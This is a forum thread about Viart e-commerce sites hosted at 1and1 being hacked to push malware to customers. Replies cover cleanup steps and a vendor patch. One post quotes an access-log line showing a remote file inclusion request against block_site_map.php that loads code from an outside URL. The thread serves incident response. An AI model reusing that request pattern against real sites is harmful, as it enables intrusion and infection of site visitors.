We are currently having our Viart site attacked. Someone is inserting code on to pages to install unwanted programs on to our customers PCs. After talking to our host (1and1) they turn around and blame our software (Viart) for the security issue. Has anyone had any issues with their site being hacked? We've been listed as hazerdous by Google now which will certainly damage our business if we can't keep the hackers out.

There is a thread on here which I started after finding my site hacked - you are not the onlt one. Lots of info in the thread titled, Has been site been Hacked?

Hi Mick,
 
Please look through the thread mentioned by Andrew, http://www.viart.com/has_my_site_been_hacked.html
In brief, you need to:
1. Scan your working computers for viruses.
2. Change FTP access credentials.
3. Fix index files.
 
WBR,
ViArt Support Team
 

Mick
 
For what it is worth, I have two server contracts with 1&1. They provide a great service but I never take responses like this at face value.
More than once I have challenged their responses to me so I recommend you take 1&1 analysis with a little care.
I certainly don't think they are resposible for the hack but I am also happy to conceded that Viart is sound.
I no longer use ftp but upload files now with SSH using Cuteftp Professional - it's a lot more secure.
 
Chris

The FTP account that was used to gain access to the site was an extra FTP account that was never used to upload to the site with, so the FTP account details should only have been available directly from my PC. Though strangely we have other Viart sites hosted but none of the others have been attacked, event though my PC holds all those FTP logins.
 
I'm keeping an eye on the FTP logs regularly to see if anyones attempting to gain access.

Hi,
I have just received a WARNING email from the abuse team at 1and1 which is where I host all my sites to say that I have been hacked. "See Below" they sent me?
 
125.164.236.16 - - [12/Dec/2007:13:01:16 +0100] "POST /blocks/block_site_map.php?root_folder_path=http://www.fbmk.upm.edu.my/c
cms/home/help.txt?? HTTP/1.1" 200 37614 www.m2bristol.ltd.uk "http://www.m2bristol.ltd.uk/blocks/block_site_map.php?root_folder_path=
http://www.fbmk.upm.edu.my/ccms/home/help.txt??" "Opera/9.23 (Windows NT 5.1; U; en)" "-"
 
They have asked me to fix this problem or run the risk of having my account closed which would cause great problems to all my other customers.
 
It is interesting that the other posts here all seem to be with 1and1, the problem is what do I do about this?
 
Any comments.
Msquared

In addition to the above I posted, this is the response I received from 1and1 after contacting them.
**************************************************************
The above was taken from your access logs. It shows that /blocks/block_site_map.php was used to perpetrate the hack.
 
Please contact the developers for this script/application. You will likely need to install a version update and/or security patch to prevent further abuse.
 
Also, reply to this email in acknowledgement of this issue. Failure to do so can result in your account being locked and possibly terminated.
**************************************************************

Have you installed a patch from
http://www.viart.com/site_map_security_fix_for_release_3_3_2.html

Hi James,
Not Sure? the install was new so didn't see any reason for updating files? I will do straight away.
 
Thank you for the feedback.